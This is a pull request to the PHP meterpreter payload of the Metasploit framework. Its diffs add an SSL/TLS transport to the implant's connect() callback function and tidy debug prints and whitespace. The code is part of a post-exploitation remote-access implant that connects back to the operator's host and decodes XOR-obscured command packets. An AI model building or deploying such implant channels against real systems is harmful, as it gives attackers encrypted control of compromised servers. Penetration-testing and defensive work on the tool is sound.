### PR TITLE
Implement TLS transport for PHP meterpreter

### DIFF
--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -990,36 +990,29 @@ function connect($ipaddr, $port, $proto='tcp') {
     if (is_callable('stream_socket_client')) {
         my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})");
         if ($proto == 'ssl') {
-            $sock = stream_socket_client(
-                "{$proto}://{$ipaddr}:{$port}",
-                $errno,
-                $errstr,
-                5,
-                STREAM_CLIENT_ASYNC_CONNECT
-            );
+            $sock = stream_socket_client("ssl://{$ipaddr}:{$port}",
+                $errno, $errstr, 5, STREAM_CLIENT_ASYNC_CONNECT);
             if (!$sock) { return false; }
-            register_stream($sock);
             stream_set_blocking($sock, 0);
+            register_stream($sock);
         } elseif ($proto == 'tcp') {
-            $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
+            $sock = stream_socket_client("tcp://{$ipaddr}:{$port}");
             if (!$sock) { return false; }
             register_stream($sock);
         } elseif ($proto == 'udp') {
-            $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
+            $sock = stream_socket_client("udp://{$ipaddr}:{$port}");
             if (!$sock) { return false; }
             register_stream($sock, $ipaddr, $port);
-        } else {
-            my_print("WTF proto is this: '$proto'");
         }
     } else
     if (is_callable('fsockopen')) {
         my_print("fsockopen");
         if ($proto == 'ssl') {
-            $sock = fsockopen("{$proto}://{$ipaddr}:{$port}");
+            $sock = fsockopen("ssl://{$ipaddr}:{$port}");
+            stream_set_blocking($sock, 0);
             register_stream($sock);
-            stream_set_blocking($sock,0);
         } elseif ($proto == 'tcp') {
-            $sock = fsockopen($ipaddr,$port);
+            $sock = fsockopen($ipaddr, $port);
             if (!$sock) { return false; }
             if (is_callable('socket_set_timeout')) {
                 socket_set_timeout($sock, 2);

--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -998,18 +998,15 @@ function connect($ipaddr, $port, $proto='tcp') {
                 STREAM_CLIENT_ASYNC_CONNECT
             );
             if (!$sock) { return false; }
-            my_print("Got a sock: $sock");
             register_stream($sock);
-            stream_set_blocking($sock,0);
+            stream_set_blocking($sock, 0);
         } elseif ($proto == 'tcp') {
             $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
             if (!$sock) { return false; }
-            my_print("Got a sock: $sock");
             register_stream($sock);
         } elseif ($proto == 'udp') {
             $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
             if (!$sock) { return false; }
-            my_print("Got a sock: $sock");
             register_stream($sock, $ipaddr, $port);
         } else {
             my_print("WTF proto is this: '$proto'");
@@ -1393,7 +1390,7 @@ while (false !== ($cnt = select($r, $w, $e, $t))) {
             $xor = substr($packet, 0, 4);
             $header = xor_bytes($xor, substr($packet, 4, 28));
             $len_array = unpack("Nlen", substr($header, 20, 4));
-            # length of the packet should be the packet header size 
+            # length of the packet should be the packet header size
             # minus 8 for the tlv length + the required data length
             $len = $len_array['len'] + 32 - 8;
             # packet type should always be 0, i.e. PACKET_TYPE_REQUEST

--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -989,12 +989,27 @@ function connect($ipaddr, $port, $proto='tcp') {
     # unnecessarily, but fall back to socket_create if they aren't available.
     if (is_callable('stream_socket_client')) {
         my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})");
-        $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
-        my_print("Got a sock: $sock");
-        if (!$sock) { return false; }
-        if ($proto == 'tcp') {
+        if ($proto == 'ssl') {
+            $sock = stream_socket_client(
+                "{$proto}://{$ipaddr}:{$port}",
+                $errno,
+                $errstr,
+                5,
+                STREAM_CLIENT_ASYNC_CONNECT
+            );
+            if (!$sock) { return false; }
+            my_print("Got a sock: $sock");
+            register_stream($sock);
+            stream_set_blocking($sock,0);
+        } elseif ($proto == 'tcp') {
+            $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
+            if (!$sock) { return false; }
+            my_print("Got a sock: $sock");
             register_stream($sock);
         } elseif ($proto == 'udp') {
+            $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
+            if (!$sock) { return false; }
+            my_print("Got a sock: $sock");
             register_stream($sock, $ipaddr, $port);
         } else {
             my_print("WTF proto is this: '$proto'");
@@ -1002,7 +1017,11 @@ function connect($ipaddr, $port, $proto='tcp') {
     } else
     if (is_callable('fsockopen')) {
         my_print("fsockopen");
-        if ($proto == 'tcp') {
+        if ($proto == 'ssl') {
+            $sock = fsockopen("{$proto}://{$ipaddr}:{$port}");
+            register_stream($sock);
+            stream_set_blocking($sock,0);
+        } elseif ($proto == 'tcp') {
             $sock = fsockopen($ipaddr,$port);
             if (!$sock) { return false; }
             if (is_callable('socket_set_timeout')) {


### PR DESCRIPTION
This is the payloads section of MSF #7669  (and a resubmission of #208)

Implement SSL transport via streams, atop the current version of PHP meterpreter (with GUIDs and all).

This version does everything in a single file, relying on the MSF payload generation component to perform string substitution in order to convert the `connect($ipaddr, $port, $proto='tcp')` to
`function connect($ipaddr, $port, $proto='ssl')`.